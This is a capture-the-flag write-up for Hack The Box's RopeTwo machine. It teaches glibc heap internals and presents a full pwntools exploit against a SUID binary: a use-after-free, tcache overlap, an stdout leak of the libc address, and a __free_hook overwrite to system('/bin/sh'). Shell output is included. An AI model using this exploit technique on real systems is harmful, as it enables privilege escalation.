The big heap adventure. Mastering heap exploitation techniques on a Hack The Box virtual machine

This article covers the following topics: memory management algorithms in Linux, heap exploitation techniques, and exploitation of the Use-After-Free (UAF) vulnerability on a host where all protection mechanisms are enabled. The target machine is RopeTwo, one of the most hardcore VMs on Hack The Box.

My previous article, Secrets of V8 Engine, describes the exploitation of a vulnerability intentionally left in the V8 Engine. As a result, you get a shell, but to advance further and capture the user flag, you have to solve a new complicated task: exploit the existing memory management vulnerabilities.

Intelligence collection

I connect to the VM over SSH and run a script that searches for privilege escalation vulnerabilities. Personally, I prefer to use LinPEAS for this purpose.

artex@kali:/home/artex/HTB/RopeTwo# ssh -i key chromeuser@10.10.10.196
artex@kali:/home/artex/HTB/RopeTwo# scp -i ssh/key linpeas.sh chromeuser@10.10.10.196:/tmp
chromeuser@rope2:/tmp$ chmod +x linpeas.sh
chromeuser@rope2:/tmp$ ./linpeas.sh > linpeas.txt
artex@kali:/home/artex/HTB/RopeTwo# scp -i ssh/key chromeuser@10.10.10.196:/tmp/linpeas.txt linpeas.txt

The report has to be thoroughly examined line-by-line. In the “Interesting Files – SUID” section, I see a file called rshell.

Files with SUID bit set
Files with SUID bit set

Let’s see how it works.

Running rshell
Running rshell

Apparently, this is a restricted shell with SUID bit; it definitely deserves closer attention. I download rshell and unleash Ghidra on it. Instead of providing the full disassembled code listing, I created a simplified diagram showing the main logic of rshell functions.

Diagram of disassembled functions
Diagram of disassembled functions

It turns out that this not a restricted shell, but just its emulation. Only a few commands are available: add, edit, rm, ls, echo, id, and whoami. The first four of them (in fact, only three, see below) are of utmost interest. These commands allow to create, modify, delete, and display objects (“files”) and allocate respective memory chunks having certain size (no more than 112 bytes) and storing certain content. Furthermore, the ls command displays only file names, not their content. In other words, everything indicates that my only option is heap exploitation.

Plenty of information on this topic is available on the Internet. If you are interested in it, I strongly recommend to visit the website of Dhaval Kapil. Going back to RopeTwo, first of all, I have to find in the code vulnerabilities that can be exploited.

At a first glance, the code doesn’t contain any obvious errors. The functions seem to be safe, size checks are in place, and input is terminated with zero. I spent plenty of time before locating a Use-After-Free (UAF) vulnerability.

For more information on UAF, see the Orange Cyberdefense blog.

Environment setup

I will write the exploit using pwntools, a handy Python library specially designed for this purpose. First of all, I have to set up the environment. In addition to rshell, I download from RopeTwo glibc (a standard C library implementing system calls and basic functions like malloc, open, and printf) and the ld dynamic linking library. They are required for full version compatibility (new glibc releases often contain changes that fix vulnerabilities, and it’s crucial for my purposes that offsets of all functions are the same). Below is a table listing glibc versions and various heap exploitation techniques suitable for them.

Popular heap exploitation techniques
Popular heap exploitation techniques

As you can see, the server uses libc version 2.29.

libc version on the server
libc version on the server

So, I have to find on the Internet and download libc version 2.29 with debugging symbols; otherwise, it would be very difficult to write an exploit. I have no doubt that you can handle this quest.

Next, I patch rshell using the command patchelf --set-interpreter ./ld-2.29.so rshell so that it uses the right linker version.

To launch rshell with the right libc version, I use the following command:

LD_PRELOAD='libc-2.29.so' rshell
Checksec output
Checksec output

The checksec output looks scary: all protective mechanisms are enabled. But I accept the challenge!

  1. Full RELRO. The Global Offset Table (GOT) is read-only. This means that I cannot overwrite a function pointer in it to alter the program flow.
  2. Canary found. The stack contains a ‘canary’ (i.e. a certain value; if it’s overwritten, this indicates that the stack was altered); accordingly, stack overflow attacks are impossible (unless I find a way to gain control over the ‘canary’).
  3. NX enabled. There are no memory areas allowing simultaneous writing and execution (RWX). Accordingly, I cannot inject a shellcode into the address space and execute it.
  4. PIE enabled. PIE means Position Independent Executable: the basic address of the executable file changes every time it’s launched; accordingly, I cannot use ROP and ret2libc without a leak.

First of all, I must write auxiliary functions emulating user input.

def add(name, size, content="A"):
io.sendlineafter('$ ', 'add '+str(name))
io.sendlineafter('size: ', str(int(size)))
io.recvuntil("content: ")
io.sendline(content)
def edit(name, size, content="A"):
io.sendlineafter('$ ', 'edit '+str(name))
io.sendlineafter('size: ', str(int(size)))
if int(size) != 0:
io.recvuntil("content: ")
io.send(content)
def rm(name):
io.sendlineafter('$ ', 'rm '+str(name))

Important: I cannot use io.send(content) in the add function as I use it in the edit function: add uses fgets to write content, while edit uses read. Therefore I have no choice but to use the io.sendline(content) method that adds a line break (and some headache, see below) in the end.

Heap, bins, and chunks

Memory bins are used to store freed memory chunks. Strictly speaking, a bin is a list (doubly- or singly-linked one) of free (i.e. nonallocated) chunks. Its main purpose is to quickly allocate memory sections (according to the statistics, programs frequently allocate and clear memory chunks of the same size). The linkage type used by a specific list depends on the bin the free chunk gets into. This, in turn, depends on the chunk size that increases in multiples of 16 bytes (0x20 → 0x30 → 0x40…). Accordingly, the least significant 4 bits in the chunk size field are not used. Instead, they contain chunk status flags:

  • PREV_INUSE – means that the previous chunk is in use (and vice versa: if this flag isn’t set, the previous chunk is not in use);
  • IS_MMAPPED – means that the chunk has been allocated via mmap(); and 
  • NON_MAIN_ARENA – means that the chunk doesn’t belong to the main arena.

Arena is a structure of the malloc function containing bins for freed chunks.

The maximum number of arenas for a process is limited by the number of processor cores available to this process.

Currently, there are five types of bins (the figures are provided for 64-bit apps).

  1. Tcache bin (introduced in glibc 2.26) stores any chunks less or equal to 0x410 bytes; 64 singly-linked lists per each arena. Each Tcache bin stores chunks of the same size. Each Tcache bin can store up to seven free chunks.
  2. Fast bin stores any chunks less or equal to 0x0b bytes; 10 singly-linked lists 0x20 to 0xb0 bytes in size per each arena.
  3. Unsorted bin is a doubly-linked list that may contain chunks of any size. Each arena has only one such list. When memory is allocated, the following bins are checked for free chunks prior to the unsorted bin: tcache, fastbin, and smallbin. The large bin is checked last.
  4. Small bin is a collection of 62 doubly-linked lists 0x20 to 0x3f0 bytes in size per each arena (overlaps with fastbins by the size range).
  5. Large bin is a collection of 62 doubly-linked lists per each arena; each of these lists contains chunks whose size falls into a certain range (e.g. 0x400 largebin contains chunks 0x400-0x430 bytes in size).

For illustration purposes, below is simple code that creates and clears two chunks 0x30 bytes each.

add(0, 0x28)
add(1, 0x28)
rm(0)
rm(1)

Let’s check how it looks in GDB. As you can see, both chunks ended up in tcachebin 0x30. The tcachebin structure is shown on the screenshot below.

Tcachebin in the debugger
Tcachebin in the debugger

The scheme of a singly-linked list is as follows.

Singly-linked list
Singly-linked list

A doubly-linked list scheme is shown below (for small bins, the Size is the same; while for large bins, the fd_nextsize and bk_nextsize pointers are added).

Doubly-linked list
Doubly-linked list

fd points to the next chunk on the list, while bk, on the previous one.

Writing exploit

Done with theory; now let’s try to write an arbitrary write primitive using UAF. Important: I cannot use the Tcache Dup (Double Free) technique because glibc 2.29 includes protection against it.

Good news is that instead of Double free, I can use realloc with zero size. An example of such code is shown below:

--skip--
def debug(breakpoints):
script_noaslr= ”’
set verbose on
break *0x555555555656
commands
silent
tcachebins
continue
end
continue
”’
gdb.attach(io,gdbscript=script_noaslr)

TARGET=p64(0x55555555a3f0)
VALUE=p64(0xdeadbeef)
add(‘A’, 0x28)
edit(‘A’, 0) # Place chunk into tcachebin 0x30
io.sendlineafter(‘ ‘, ‘ls’) # Display tcachebins listing
edit(‘A’, 0x28, TARGET) # Write the target address to the ’empty’ chunk replacing the fd pointer
io.sendlineafter(‘
‘, ‘ls’) # Now tcachebins contain two chunks, and one of them points to TARGET
add(‘B’, 0x28) # ‘Take’ from the bin the last chunk in the chain
edit(‘B’, 0x38) # Increase the chunk B size and clear it
rm(‘B’)
edit(‘A’,0x48) # Increase the chunk A size and clear it
rm(‘A’)
io.sendlineafter(‘$ ‘, ‘ls’) # There are three tcachebins, and 0x30 points to TARGET
add(‘A’, 0x28, VALUE) # Allocate the chunk 0x30 in size, thus, writing VALUE to TARGET
--skip--

I insert this fragment into my script and run it: ./uaf.py NOASLR GDB.

The first parameter disables ASLR (Address Space Layout Randomization), while the second one launches GDB.

To display the output of tcachebins in pwndbg in the key points, I bind it to the address of the ls function (0x555555555656). In other words, every time ls is called, the debugger will display information on tcachebins.

Tcachebins output in debugger
Tcachebins output in debugger

Success! The value at 0x55555555a3f0 has been overwritten!

The value in the memory has been overwritten
The value in the memory has been overwritten

Now that I have an arbitrary write primitive, I have to figure out how to use it (leaping ahead, I must say that the primitive will be modified in the final exploit because I am limited to two files). The standard action plan is as follows: leak the address of the libc library, use the offset to calculate its base address, and then substitute the call of some hook with one_gadget or with a system call if one_gadget doesn’t work (i.e. the conditions for its call aren’t met).

At this stage, it’s normally possible to check the libc address in /proc/_pid_/maps and start writing the exploit. Too bad, this trick doesn’t work on a virtual machine: if a binary is launched with SUID bit, the memory map of the process won’t be available for reading.

And the question is: how to leak the libc address if all the protection mechanisms in the binary are enabled and there are no obvious vulnerabilities in the code? Especially taking that I am limited to two chunks up to 70 bytes each! At first glance, the task seems to be impossible… To find a solution, I have to spend long hours searching on the Internet.

The idea is as follows: create a fake unsorted bin and brute-force the 4 bits in the pointer to stdout. But let’s not run ahead.

First, I have to increase the chunk size to more than 420 bytes, so that the chunk goes to unsorted bin after clearing. The reason why the unsorted bin is so important is that fd and bk contain pointers to libc (main arena + offset). This is how I can gain access to the libc address space bypassing PIE and ASLR!

Then I can substitute the last two bytes in this address so that it points to stdout. Because of ASLR, the offset is different at each start, but fortunately, by only 4 bits! So, the main question is: how to make stdout display the libc address?

A thorough examination of the source code brings the following information.

When puts is called, the _IO_new_file_overflow function is called using the following chain: _IO_puts_IO_sputn_IO_new_file_xsputn_IO_new_file_overflow. In _IO_new_file_overflow, the _IO_do_write call, that is defined as a macro of the _IO_new_do_write function, is of utmost interest. If the flags indicate that the buffer isn’t empty, then the buffer value (_IO_write_base points to the buffer beginning; _IO_write_ptr, to its end) is printed in stdout. Therefore, if I change the _IO_2_1_stdout_ flags in the right way, I will be able to leak the libc address!

Sounds like a plan, let’s try to implement it. My first objective is to ensure that the chunk goes to the unsorted bin. But how? After all, I am limited to 0x70 bytes!

So, I have to create a fake big chunk! First of all, I prepare auxiliary chunks:

add(0, 0x68)
edit(0, 0, "") # tcache 0x70
edit(0, 0x18) # tcache 0x50 (0x70-0x20)
rm(0) # tcache 0x20
add(0, 0x48)
edit(0, 0, "") # tcache 0x50
edit(0, 0x48, "C"*0x10) # Rewriting fd and bk pointers to avoid the double free check
rm(0)

As a result of these manipulations with tcache, the chunks are now superimposed on one another.

Chunks are superimposed on one another
Chunks are superimposed on one another

Now I can change the size of my fake chunk:

add(0, 0x48) # Take one tcache 0x50 from the bin
add(1, 0x68, b"C"*0x18+p64(0x451)) # Take tcache 0x70 and write 0x451 in the Size field of the fake chunk
rm(1)
Size of the fake chunk has been changed
Size of the fake chunk has been changed

Terrific! The size of tcache 0x50 has been changed to 0x450. Now I have to allocate enough memory and free it.

# Allocate 0x400+ bytes for the unsorted bin
for i in range(9):
add(1, 0x28)
edit(1, 0x70)
rm(1)
# After that, an unsorted bin is created, and its fd points to the main_arena + 96
# Since the chunks are superimposed on one another, this fd pointer coincides with fd pointer of tcache 0x50
edit(0, 0, "")
# Partially overwrite the fd pointer to get to stdout (brute-force 4 bits)
edit(0, 0x38, p16(0x7750))

As a result, I get the following picture:

Replacing the fd pointer to stdout
Replacing the fd pointer to stdout

The beginning of IO_2_1_stdout looks as follows:

stdout structure
stdout structure

Almost done! I take the extra chunk from tcache 0x50 and write the payload to stdout-0x10 (with some luck, the chance is 1/16). A few words about the payload: I need to write a string of 16 bytes before stdout to pass this string to system ("/bin/sh") as a parameter, so I use the opportunity to do this now. Then I have to the write the value of _flags. To trick the _IO_new_do_write function, I will need the following flags defined in libio.h:

#define _IO_MAGIC 0xFBAD0000 /* Magic number */
...
#define _IO_CURRENTLY_PUTTING 0x800
#define _IO_IS_APPENDING 0x1000

So, I write the value 0xfbad1800 in the _flags field of _IO_2_1_stdout: as a result, _IO_new_do_write thinks that the buffer isn’t empty. The next three qwords (i.e. IO_read pointers) must be empty, but I write the "leak:" string to _IO_read_base to simplify future searches for the required address. The rjust function aligns the "leak:" string right; as a result, the address of _IO_write_base goes immediately after it. The first parameter of the function is the width of the alignment borders; the second one is the character to fill in empty spaces (by default, it’s the space character). Why the width of the alignment borders is 7 and not 8? Remember I mentioned earlier that the add function uses fgets and adds a line break at the end? That’s why I have to make a 1-byte adjustment.

add(1, 0x48) # Take the extra tcache 0x50 from the bin
edit(1, 0x18)
rm(1)
edit(0, 0x18, "C"*0x10)
rm(0)
add(0, 0x48, b"/bin/sh\x00"+b"\x00"*8+p64(0xfbad1800)+p64(0)*2+b"leak:".rjust(7, b"\x00"))

Finally, I get to the required address (_IO_2_1_stdout_ – 0x10), and the picture is as follows:

0x15555551e750 <_IO_2_1_stderr_+208>: 0x0068732f6e69622f ("/bin/sh") 0x0000000000000000
0x15555551e760 <_IO_2_1_stdout_>: 0x00000000fbad1800 (flags) 0x0000000000000000
0x15555551e770 <_IO_2_1_stdout_+16>: 0x0000000000000000 0x0a3a6b61656c0000 ("leak:\n")
0x15555551e780 <_IO_2_1_stdout_+32>: 0x000015555551e700 (_IO_write_base) 0x000015555551e7e3
0x15555551e790 <_IO_2_1_stdout_+48>: 0x000015555551e7e3 0x000015555551e7e3
0x15555551e7a0 <_IO_2_1_stdout_+64>: 0x000015555551e7e4 0x0000000000000000

Because the add function in rhsell uses puts, the much-desired libc address (_IO_write_base_) immediately leaks into my hands!

Now all I have to do is calculate the required offsets (to be specific, I have to compute only libc_base, and pwntools will automatically do the rest of work!), replace __free_hook with system using UAF, and call memory cleanup with the "/bin/sh" parameter (which has already been taken care of).

The full exploit listing with comments is provided below.

But now I have to figure out how to connect my exploit to rshell and automate the process. For this purpose, pwntools offers a great tool called SSH tube.

SSH tube allows to connect to the server over SSH and exploit the target process using Python. But the problem is that there is no Python 2 on the RopeTwo server, while pwntools supports only it by default. So, I have no choice but do some tinkering…

First, I locate on my PC the file ../dist-packages/pwnlib/tubes/ssh.py, find in it the string listing the Python interpreters, and add python3 to it:

script = 'for py in python2.7 python2 python python3; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)

Another problem is that rshell freezes on a regular basis when brute-forcing fails; so, I am going to restart brute-forcing at certain time intervals using signal.

info

A signal is an asynchronous notification sent to a Linux process to notify it of an event. In this particular case, I need SIGALRM, a signal that is sent to a process when the previously specified time limit elapses. For more information, see the respective Wikipedia article.

Below is the final exploit code:

#!/usr/bin/env python3
from pwn import *
import signal
# Auxiliary function to restart frozen shell
def handler(signum, frame):
log.warning("Game over, rshell freezes")
io.close()
# Base settings
context(os="linux", arch="amd64")
localfile = "./rshell"
locallibc = "./libc-2.29.so"
pf = lambda name,num :log.info(name + ": 0x%x" % num)
elf = ELF(localfile)
libc = ELF(locallibc)
io = process(localfile, env={'LD_PRELOAD': locallibc}, timeout=1)
# Debugging function
def debug(breakpoints):
script= '''
continue
'''
gdb.attach(io,gdbscript=script)
# Auxiliary functions
def add(name, size, content="A"):
io.sendlineafter('$ ', 'add '+str(name))
io.sendlineafter('size: ', str(int(size)))
io.recvuntil("content: ")
io.sendline(content)
def edit(name, size, content="A"):
io.sendlineafter('$ ', 'edit '+str(name))
io.sendlineafter('size: ', str(int(size)))
if int(size) != 0:
io.recvuntil("content: ")
io.send(content)
def rm(name):
io.sendlineafter('$ ', 'rm '+str(name))
def exp():
# Start timer (25 s)
signal.alarm(25)
add(0, 0x68) # Create auxiliary tcache bins
edit(0, 0, "") # tcache 0x70
edit(0, 0x18) # tcache 0x50 (0x70-0x20)
rm(0) # tcache 0x20
add(0, 0x48) # Create fake chunk
edit(0, 0, "") # tcache 0x50
edit(0, 0x48, "C"*0x10) # Overwrite fd and bk pointers to avoid the double free check
rm(0)
add(0, 0x48) # Take one tcache 0x50 from the bin
add(1, 0x68, b"C"*0x18+p64(0x451)) # Take tcache 0x70 and write 0x451 in the Size field of the fake chunk
rm(1)
# Allocate 0x400+ bytes for the unsorted bin to bypass the prev_inuse check in the free() function
for i in range(9):
add(1, 0x28)
edit(1, 0x70) # Despite being limited to 0x70, I get a chunk 0x80
rm(1)
# After that, an unsorted bin is created, and its fd points to main_arena + 96
# Since the chunks are superimposed on one another, this fd pointer coincides with fd pointer of tcache 0x50
edit(0, 0, "")
# Partially overwrite the fd pointer to get to stdout (brute-force 4 bits)
edit(0, 0x38, p16(0x7750))
# Take the extra tcache 0x50 from the bin
add(1, 0x48)
edit(1, 0x18)
rm(1)
edit(0, 0x18, "C"*0x10) # Overwrite fd and bk pointers to avoid the double free check
rm(0)
# Write the leaked address of _IO_write_base to stdout
add(0, 0x48, b"/bin/sh\x00"+b"\x00"*8+p64(0xfbad1800)+p64(0)*2+b"leak:".rjust(7, b"\x00"))
# If the resultant string doesn't contain "leak:", try again
if len(io.recvuntil("leak:")) == 0:
log.debug("failed")
return
# The address is found; calculate the offset of libc_base (it's different in different libc versions)
leak_addr=u64(io.recv(8)[1:7]+b'\x00'*2)
pf("leak_addr", leak_addr)
libc_base = leak_addr - (0x15555551d700-0x155555338000) #REAL
#libc_base = leak_addr - (0x7ffff7fc7700 - 0x7ffff7c15000) #DEBUG
libc.address = libc_base
pf("libc_base", libc_base)
# Repeat the superimposition trick (tcache 0x60 is nested into tcache 0x80)
add(1, 0x70) # Despite being limited to 0x70, I get a chunk 0x80 in size
edit(1, 0, "")
edit(1, 0x18, "C"*0x10) # Overwrite fd and bk pointers to avoid the double free check
rm(1)
# Write the pointer to __free_hook into fd of tcache 0x60
add(1, 0x70, b"C"*0x18+p64(0x61)+p64(libc.sym["__free_hook"]))
rm(1)
# Take the extra tcache 0x60 from the bin
add(1, 0x58)
edit(1, 0x28)
rm(1)
# Overwrite __free_hook with system
add(1, 0x58, p64(libc.symbols["system"]))
# Delete the 0 file that points to '/bin/sh\x00'. As a result, I get system("/bin/sh")!
rm(0)
signal.alarm(0) # Reset the timer
io.interactive() # Switch to the interactive mode
if not args.REMOTE and args.GDB:
debug([])
signal.signal(signal.SIGALRM, handler)
# Brute-force loop
while True:
try:
print("----------------------------------------------------------")
#io = process(localfile, env={'LD_PRELOAD': locallibc}, timeout=10) # - local
#l = listen(31337) # For remote connection and debugging
#io = l.wait_for_connection()
s = ssh(host='10.10.10.196', user='chromeuser',keyfile='ssh_key')
io = s.process("/usr/bin/rshell")
exp()
except Exception:
io.close()

The brute-force procedure normally takes 3-4 minutes. At the end, you get the much-desired shell running on behalf of the user r4j! Finally, this incredibly difficult flag is yours! Or not yet?!

[+] Connecting to 10.10.10.196 on port 22: Done
[+] Starting remote process '/usr/bin/rshell' on 10.10.10.196: pid 14081
[*] leak_addr: 0x7f5ed04e7700
[*] libc_base: 0x7f5ed0302000
[*] Switching to interactive mode
$ $ id
uid=1000(r4j) gid=1001(chromeuser) groups=1001(chromeuser)
$ $ pwd
/home/chromeuser
$ $ cd /home/r4j
$ $ ls -la
total 40
drwx—— 6 r4j r4j 4096 Jun 1 2020 .
drwxr-xr-x 4 root root 4096 Feb 5 2020 ..
lrwxrwxrwx 1 root root 9 Feb 23 2020 .bash_history → /dev/null
-rwx—— 1 r4j r4j 220 Apr 4 2019 .bash_logout
-rwx—— 1 r4j r4j 88 Apr 21 19:56 .bashrc
drwx—— 2 r4j r4j 4096 Feb 23 2020 .cache
drwx—— 2 r4j r4j 4096 May 27 2020 .config
drwx—— 3 r4j r4j 4096 Feb 23 2020 .gnupg
-rwx—— 1 r4j r4j 807 Apr 4 2019 .profile
drwx—— 2 r4j r4j 4096 Dec 21 19:47 .ssh
-rw-r—– 1 root r4j 33 Dec 21 14:08 user.txt
$ $ cat user.txt
cat: user.txt: Permission denied

Hmm, another puzzle: only root and a user from the r4j group can read the flag, while my gid is still chromeuser!

I assume that you can solve this problem by yourself; it’s not really difficult. Good luck!

(ʞuıʃɯʎs :ʇuıɥ)


Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>